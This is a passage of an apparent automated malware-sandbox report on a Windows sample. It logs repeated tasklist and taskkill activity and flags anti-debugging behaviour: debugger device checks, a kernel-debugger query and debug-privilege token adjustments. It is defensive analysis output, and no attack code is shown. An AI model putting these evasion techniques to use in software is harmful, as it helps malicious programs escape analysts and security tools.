Source: C:\Windows\System32\tasklist.exe TID: 3480Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 872Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 872Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3764Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3764Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3756Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3756Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3264Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3264Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3904Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3904Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3892Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3892Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3912Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3912Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 544Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 544Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2008Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2008Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2216Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2216Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3456Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3456Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3516Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3516Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 1832Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 1832Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3160Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3160Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 1612Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 1612Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\tasklist.exe TID: 404Thread sleep time: -120000s >= -60000s
Source: C:\Windows\System32\tasklist.exe TID: 2204Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2104Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2104Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 580Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 580Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 292Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 292Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3712Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3712Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3452Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3452Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2332Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2332Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2548Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2548Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 1372Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 1372Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2560Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2560Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2872Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2872Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2312Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2312Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\tasklist.exe TID: 1756Thread sleep time: -120000s >= -60000s
Source: C:\Windows\System32\tasklist.exe TID: 2708Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2600Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2600Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2364Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2364Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2828Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2828Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2908Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2908Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2896Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2896Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2852Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2852Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2572Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2572Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 1916Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 1916Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2092Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2092Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 1196Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 1196Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3340Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3340Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2588Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2588Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3344Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3344Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\tasklist.exe TID: 636Thread sleep time: -120000s >= -60000s
Source: C:\Windows\System32\tasklist.exe TID: 3328Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 768Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 768Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 1668Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 1668Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 172Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 172Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2256Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2256Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3228Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3228Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 1300Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 1300Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3380Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3380Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 1380Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 1380Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3724Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3724Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 488Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 488Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3404Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3404Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 1812Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 1812Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\tasklist.exe TID: 872Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\tasklist.exe TID: 3840Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3872Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3872Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 988Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 988Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 436Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 436Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3960Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3960Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3180Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3180Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2284Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2284Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2920Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2920Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2456Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2456Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 544Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 544Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 1908Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 1908Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3932Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3932Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2128Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2128Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\tasklist.exe TID: 3468Thread sleep time: -120000s >= -60000s
Source: C:\Windows\System32\tasklist.exe TID: 3564Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3988Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3988Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3560Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3560Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2500Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2500Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 1312Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 1312Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2724Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2724Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3948Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3948Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2204Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2204Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3708Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3708Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2096Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2096Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 228Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 228Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 728Thread sleep time: -120000s >= -60000s
Queries a list of all running processesShow sources
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\installer.exeProcess information queried: ProcessInformation

Anti Debugging:

barindex
Checks for debuggers (devices)Show sources
Source: C:\inst_fold\fp.exeFile opened: C:\Windows\system32\en-US\filemgmt.dll.mui
Source: C:\inst_fold\fp.exeFile opened: C:\Windows\system32\filemgmt.dll
Source: C:\inst_fold\fp.exeFile opened: C:\Windows\WinSxS\FileMaps\inst_fold_e86aef04a9fd3f16.cdf-ms
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))Show sources
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exeSystem information queried: KernelDebuggerInformation
Enables debug privilegesShow sources
Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
